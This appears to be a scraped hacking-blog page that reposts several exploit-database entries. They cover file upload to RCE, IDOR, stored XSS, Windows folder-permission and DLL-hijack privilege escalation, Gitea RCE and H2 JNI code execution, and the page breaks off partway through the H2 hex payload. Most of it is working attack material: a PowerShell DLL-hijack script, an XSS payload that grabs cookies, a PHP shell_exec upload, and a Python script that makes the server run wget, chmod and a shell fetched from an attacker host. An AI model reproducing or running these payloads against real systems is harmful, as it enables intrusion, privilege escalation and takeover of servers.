# Exploit Title: Responsive E-Learning System 1.0 - Unrestricted File Upload to RCE
# Date: 2020-12-24
# Exploit Author: Kshitiz Raj (manitorpotterk)
# Vendor Homepage: https://www.sourcecodester.com/php/5172/responsive-e-learning-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=5172&title=Responsive+E-Learning+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Windows 10/Kali Linux
Step 1 - Login to the application with admin credentials.
Step 2 - Click on Student or go to http://localhost/elearning/admin/student.php
Step 3 - Click on Add Student and fill the required things.
Step 4 - In image upload any php reverse shell.
Step 5 - Visit "http://localhost/elearning/admin/uploads/" and select your uploaded PHP web shell.
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863151838
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Newgen Correspondence Management System (corms) eGov 12.0 - IDOR
# Date: 29 Dec 2020
# Exploit Author: ALI AL SINAN
# Vendor Homepage: https://newgensoft.com
# Software Link: https://newgensoft.com/solutions/industries/government/e-gov-office/
# Version: eGov 12.0
# Tested on: JBoss EAP 7
# CVE : CVE-2020-35737
-----------------------------------------------------
Description:
Correspondence management is the process of handling official incoming and outgoing correspondence in government agencies. The word “correspondence” in this context refers to physical letters, direct e-delivery, emails and faxes along with all their attachments that are received by the government agencies.
-----------------------------------------------------
Vulnerability:
Affected URL:
http://server/corms/dist/#/web/home/workdesk/inbox
Vulnerability Description:
user can manipulate parameter “UserIndex” in personal setting page. this parameter can allow un-authorized access to view or change other user's personal information.
# Exploit Title: WordPress Plugin WP24 Domain Check 1.6.2 - 'fieldnameDomain' Stored Cross Site Scripting
# Date: 2021-01-03
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
# Vendor Homepage: https://wordpress.org/plugins/wp24-domain-check/
# Software Link: https://wordpress.org/plugins/wp24-domain-check/
# Version: 1.6.2
# Tested on: Apache2 - Windows 10
Vulnerable param: wp24_domaincheck[fieldnameDomain]
-------------------------------------------------------------------------
POST /w12ee3/wp-admin/options.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/w12ee3/wp-admin/options-general.php?page=wp24_domaincheck_settings&tab=advanced
Content-Type: application/x-www-form-urlencoded
Content-Length: 415
Origin: http://localhost
Connection: close
Cookie: wordpress_a25e758b4b8611d32cffab04f654ade8=admin%7C1610108483%7C9JXQJh8k8MPmNowV0sLR7zP5q0hyjw2rpi8fp0wdZNa%7C9bd3e4806dbb6058ca887771af1d82b5d04ad6c3d14f8f6f88d9604ad12ae500; wordpress_logged_in_a25e758b4b8611d32cffab04f654ade8=admin%7C1610108483%7C9JXQJh8k8MPmNowV0sLR7zP5q0hyjw2rpi8fp0wdZNa%7C8edadaf3ba084ba1d6cb6257a460f043efde74e8bcd9817826faf9ad80271d1e; wp-settings-time-1=1609659595; bp_user-role=administrator; bp_user-registered=1608898152000; bp_ut_session=%7B-q-pageviews-q-%3A1-c--q-referrer-q-%3A-q--q--c--q-landingPage-q-%3A-q-http%3A%2F%2Flocalhost%2Fw12ee3%2F-q--c--q-started-q-%3A1609657029216%7D
Upgrade-Insecure-Requests: 1
update_advanced_settings=1&option_page=wp24_domaincheck&action=update&_wpnonce=8dcf91df50&_wp_http_referer=/w12ee3/wp-admin/options-general.php?page=wp24_domaincheck_settings&tab=advanced&wp24_domaincheck%5BhtmlForm%5D=1&wp24_domaincheck[fieldnameDomain]=111%22+onfocus%3Dalert%28document.cookie%29%3B+on%3D&wp24_domaincheck%5BfieldnameTld%5D=domaincheck_tld&submit=De%C4%9Fi%C5%9Fiklikleri+kaydet
Source Code:
\wp-content\plugins\wp24-domain-check\includes\class-wp24-settings.php:
--------------------------------------------------------------------
// fieldnameDomain
add_settings_field(
'fieldnameDomain',
__( 'Domain fieldname', 'wp24-domaincheck' ),
array( $this, 'inputfield' ),
'settings_advanced',
'section_advanced_form',
array(
'name' => 'fieldnameDomain',
'type' => 'textfield',
)
);
Vulnerable: 'name' => 'fieldnameDomain'
-------------------------------------------------------------------------
Payload:
111" onfocus=alert(document.cookie); on=
-------------------------------------------------------------------------
# Exploit Title: WinAVR Version 20100110 - Insecure Folder Permissions
# Date: 2020-12-11
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: https://sourceforge.net/projects/winavr/
# Software Link: https://sourceforge.net/projects/winavr/files/WinAVR/20100110/WinAVR-20100110-install.exe
# Version: Version 20100110
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
# Info:
PS C:\WinAVR-20100110\bin> icacls.exe .
. BUILTIN\Administrators:(I)(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
Successfully processed 1 files; Failed processing 0 files
PS C:\WinAVR-20100110\bin> icacls.exe *.dll
cygwin1.dll BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
itcl32.dll BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
itk32.dll BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
libusb0.dll BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
tcl84.dll BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
tclpip84.dll BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
tk84.dll BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
Successfully processed 7 files; Failed processing 0 files
PS C:\WinAVR-20100110\bin> icacls.exe *.exe
avarice.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-addr2line.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-ar.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-as.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-c++.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-c++filt.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-cpp.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-g++.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-gcc-4.3.3.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-gcc.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-gcov.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-gdb.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-gprof.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-insight.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-ld.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-nm.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-objcopy.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-objdump.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-ranlib.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-readelf.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-size.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-strings.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-strip.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-addr2line.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-ar.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-as.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-c++.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-c++filt.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-cpp.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-g++.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-gcc-4.3.2.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-gcc.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-gcov.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-gdb.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-gprof.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-insight.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-ld.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-nm.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-objcopy.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-objdump.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-ranlib.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-readelf.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-size.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-strings.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-strip.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avrdude.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
loaddrv.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
simulavr.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
splint.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
srec_cat.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
srec_cmp.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
srec_info.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
tclsh84.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
wish84.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
Successfully processed 54 files; Failed processing 0 files
PS C:\WinAVR-20100110\bin>
# Exploit:
This vulnerability could permit executing code with the escalated privileges by hijacking one of the DLLs or *.exe files.
# Exploit Title: PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation
# Exploit Author: 1F98D
# Original Author: securifera
# Date: 12 May 2020
# Vendor Hompage: https://www.fujitsu.com/global/support/products/computing/peripheral/scanners/fi/software/fi6x30-fi6x40-ps-ip-twain32.html
# CVE: CVE-2018-16156
# Tested on: Windows 10 x64
# References:
# https://www.securifera.com/advisories/cve-2018-16156/
# https://github.com/securifera/CVE-2018-16156-Exploit
# A DLL hijack vulnerability exists in the FJTWSVIC service running as part of
# the Fujitsu PaperStream IP (TWAIN) software package. This exploit searches
# for a writable location, copies the specified DLL to that location and then
# triggers the DLL load by sending a message to FJTWSVIC over the FjtwMkic_Fjicube_32
# named pipe.
$ErrorActionPreference = "Stop"
# Example payload generated as follows
# msfvenom -p windows/x64/shell_reverse_tcp -f dll -o shell.dll LHOST=eth0 LPORT=4444
$PayloadFile = "C:\Windows\Temp\UninOldIS.dll"
if ((Test-Path $PayloadFile) -eq $false) {
Write-Host "$PayloadFile not found, did you forget to upload it?"
Exit 1
}
# Find Writable Location
$WritableDirectory = $null
$Path = (Get-ItemProperty -Path "Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment" -Name "PATH").path
$Path -Split ";" | % {
try {
[IO.File]::OpenWrite("$_\x.txt").close()
Remove-Item "$_\x.txt"
$WritableDirectory = $_
} catch {}
}
if ($WritableDirectory -eq $null) {
Write-Host "No writable directories in PATH, FJTWSVIC is not exploitable"
Exit 1
}
Write-Host "Writable location found, copying payload to $WritableDirectory"
Copy-Item "$PayloadFile" "$WritableDirectory\UninOldIS.dll"
Write-Host "Payload copied, triggering..."
$client = New-Object System.IO.Pipes.NamedPipeClientStream(".", "FjtwMkic_Fjicube_32", [System.IO.Pipes.PipeDirection]::InOut, [System.IO.Pipes.PipeOptions]::None, [System.Security.Principal.TokenImpersonationLevel]::Impersonation)
$reader = $null
$writer = $null
try {
$client.Connect()
$reader = New-Object System.IO.StreamReader($client)
$writer = New-Object System.IO.StreamWriter($client)
$writer.AutoFlush = $true
$writer.Write("ChangeUninstallString")
$reader.ReadLine()
} finally {
$client.Dispose()
}
Write-Host "Payload triggered"
# Exploit Title: Resumes Management and Job Application Website 1.0 - RCE (Unauthenticated)
# Date: 3/1/2021
# Exploit Author: Arnav Tripathy
# Vendor Homepage: https://egavilanmedia.com
# Software Link: https://egavilanmedia.com/resumes-management-and-job-application-website/
# Version: 1.0
# Tested on: linux/lamp
Submit rce.php in resume file upload unauthenticated.
Contents of rce.php
<?php
$output = shell_exec('whoami');
echo "<h1>$output</h1>";
?>
Navigate to http://localhost/Resumes Management and Job Application
Website/files/rce.php
You will get the output of whoami
# Exploit Title: Gitea 1.7.5 - Remote Code Execution
# Date: 2020-05-11
# Exploit Author: 1F98D
# Original Author: LoRexxar
# Software Link: https://gitea.io/en-us/
# Version: Gitea before 1.7.6 and 1.8.x before 1.8-RC3
# Tested on: Debian 9.11 (x64)
# CVE: CVE-2019-11229
# References:
# https://medium.com/@knownsec404team/analysis-of-cve-2019-11229-from-git-config-to-rce-32c217727baa
#
# Gitea before 1.7.6 and 1.8.x before 1.8-RC3 mishandles mirror repo URL settings,
# leading to authenticated remote code execution.
#
#!/usr/bin/python3
import re
import os
import sys
import random
import string
import requests
import tempfile
import threading
import http.server
import socketserver
import urllib.parse
from functools import partial
USERNAME = "test"
PASSWORD = "password123"
HOST_ADDR = '192.168.1.1'
HOST_PORT = 3000
URL = 'http://192.168.1.2:3000'
CMD = 'wget http://192.168.1.1:8080/shell -O /tmp/shell && chmod 777 /tmp/shell && /tmp/shell'
# Login
s = requests.Session()
print('Logging in')
body = {
'user_name': USERNAME,
'password': PASSWORD
}
r = s.post(URL + '/user/login',data=body)
if r.status_code != 200:
print('Login unsuccessful')
sys.exit(1)
print('Logged in successfully')
# Obtain user ID for future requests
print('Retrieving user ID')
r = s.get(URL + '/')
if r.status_code != 200:
print('Could not retrieve user ID')
sys.exit(1)
m = re.compile("<meta name=\"_uid\" content=\"(.+)\" />").search(r.text)
USER_ID = m.group(1)
print('Retrieved user ID: {}'.format(USER_ID))
# Hosting the repository to clone
gitTemp = tempfile.mkdtemp()
os.system('cd {} && git init'.format(gitTemp))
os.system('cd {} && git config user.email x@x.com && git config user.name x && touch x && git add x && git commit -m x'.format(gitTemp))
os.system('git clone --bare {} {}.git'.format(gitTemp, gitTemp))
os.system('cd {}.git && git update-server-info'.format(gitTemp))
handler = partial(http.server.SimpleHTTPRequestHandler,directory='/tmp')
socketserver.TCPServer.allow_reuse_address = True
httpd = socketserver.TCPServer(("", HOST_PORT), handler)
t = threading.Thread(target=httpd.serve_forever)
t.start()
print('Created temporary git server to host {}.git'.format(gitTemp))
# Create the repository
print('Creating repository')
REPO_NAME = ''.join(random.choice(string.ascii_lowercase) for i in range(8))
body = {
'_csrf': urllib.parse.unquote(s.cookies.get('_csrf')),
'uid': USER_ID,
'repo_name': REPO_NAME,
'clone_addr': 'http://{}:{}/{}.git'.format(HOST_ADDR, HOST_PORT, gitTemp[5:]),
'mirror': 'on'
}
r = s.post(URL + '/repo/migrate', data=body)
if r.status_code != 200:
print('Error creating repo')
httpd.shutdown()
t.join()
sys.exit(1)
print('Repo "{}" created'.format(REPO_NAME))
# Inject command into config file
print('Injecting command into repo')
body = {
'_csrf': urllib.parse.unquote(s.cookies.get('_csrf')),
'mirror_address': 'ssh://example.com/x/x"""\r\n[core]\r\nsshCommand="{}"\r\na="""'.format(CMD),
'action': 'mirror',
'enable_prune': 'on',
'interval': '8h0m0s'
}
r = s.post(URL + '/' + USERNAME + '/' + REPO_NAME + '/settings', data=body)
if r.status_code != 200:
print('Error injecting command')
httpd.shutdown()
t.join()
sys.exit(1)
print('Command injected')
# Trigger the command
print('Triggering command')
body = {
'_csrf': urllib.parse.unquote(s.cookies.get('_csrf')),
'action': 'mirror-sync'
}
r = s.post(URL + '/' + USERNAME + '/' + REPO_NAME + '/settings', data=body)
if r.status_code != 200:
print('Error triggering command')
httpd.shutdown()
t.join()
sys.exit(1)
print('Command triggered')
# Shutdown the git server
httpd.shutdown()
# Exploit Title: H2 Database 1.4.199 - JNI Code Execution
# Exploit Author: 1F98D
# Original Author: Markus Wulftange
# Date: 28 April 2020
# Vendor Hompage: https://www.h2database.com/
# Tested on: Windows 10 x64, Java 1.8, H2 1.4.199
# References: https://codewhitesec.blogspot.com/2019/08/exploit-h2-database-native-libraries-jni.html
# H2 allows users to gain code execution by compiling and running Java code
# however this requires the Java Compiler to be available on the machine running H2.
# This exploit utilises the Java Native Interface to load a a Java class without
# needing to use the Java Compiler
-- Write native library
SELECT CSVWRITE('C:\Windows\Temp\JNIScriptEngine.dll', CONCAT('SELECT NULL "', CHAR(0x4d),CHAR(0x5a),CHAR(0x90),CHAR(0x00),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0xff),CHAR(0x00),CHAR(0x00),CHAR(0xb8),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x0e),CHAR(0x1f),CHAR(0xba),CHAR(0x0e),CHAR(0x00),CHAR(0xb4),CHAR(0x09),CHAR(0xcd),CHAR(0x21),CHAR(0xb8),CHAR(0x01),CHAR(0x4c),CHAR(0xcd),CHAR(0x21),CHAR(0x54),CHAR(0x68),CHAR(0x69),CHAR(0x73),CHAR(0x20),CHAR(0x70),CHAR(0x72),CHAR(0x6f),CHAR(0x67),CHAR(0x72),CHAR(0x61),CHAR(0x6d),CHAR(0x20),CHAR(0x63),CHAR(0x61),CHAR(0x6e),CHAR(0x6e),CHAR(0x6f),CHAR(0x74),CHAR(0x20),CHAR(0x62),CHAR(0x65),CHAR(0x20),CHAR(0x72),CHAR(0x75),CHAR(0x6e),CHAR(0x20),CHAR(0x69),CHAR(0x6e),CHAR(0x20),CHAR(0x44),CHAR(0x4f),CHAR(0x53),CHAR(0x20),CHAR(0x6d),CHAR(0x6f),CHAR(0x64),CHAR(0x65),CHAR(0x2e),CHAR(0x0d),CHAR(0x0d),CHAR(0x0a),CHAR(0x24),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x4e),CHAR(0xb0),CHAR(0xdb),CHAR(0x83),CHAR(0x0a),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x0a),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x0a),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x03),CHAR(0xa9),CHAR(0x26),CHAR(0xd0),CHAR(0x08),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x01),CHAR(0xbe),CHAR(0xb4),CHAR(0xd1),CHAR(0x08),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x51),CHAR(0xb9),CHAR(0xb4),CHAR(0xd1),CHAR(0x09),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x0a),CHAR(0xd1),CHAR(0xb4),CHAR(0xd0),CHAR(0x28),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x01),CHAR(0xbe),CHAR(0xb0),CHAR(0xd1),CHAR(0x01),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x01),CHAR(0xbe),CHAR(0xb1),CHAR(0xd1),CHAR(0x02),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x01),CHAR(0xbe),CHAR(0xb6),CHAR(0xd1),CHAR(0x08),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0xc8),CHAR(0xbe),CHAR(0xb1),CHAR(0xd1),CHAR(0x0b),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0xc8),CHAR(0xbe),CHAR(0xb5),CHAR(0xd1),CHAR(0x0b),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0xc8),CHAR(0xbe),CHAR(0xb7),CHAR(0xd1),CHAR(0x0b),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x52),CHAR(0x69),CHAR(0x63),CHAR(0x68),CHAR(0x0a),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x50),CHAR(0x45),CHAR(0x00),CHAR(0x00),CHAR(0x64),CHAR(0x86),CHAR(0x05),CHAR(0x00),CHAR(0x1c),CHAR(0xe7),CHAR(0xa7),CHAR(0x5e),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xf0),CHAR(0x00),CHAR(0x22),CHAR(0x22),CHAR(0x20),CHAR(0x0b),CHAR(0x02),CHAR(0x0e),CHAR(0x19),CHAR(0x00),CHAR(0x12),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x1c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x04),CHAR(0x16),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x80),CHAR(0x01),CHAR(0x00),CHAR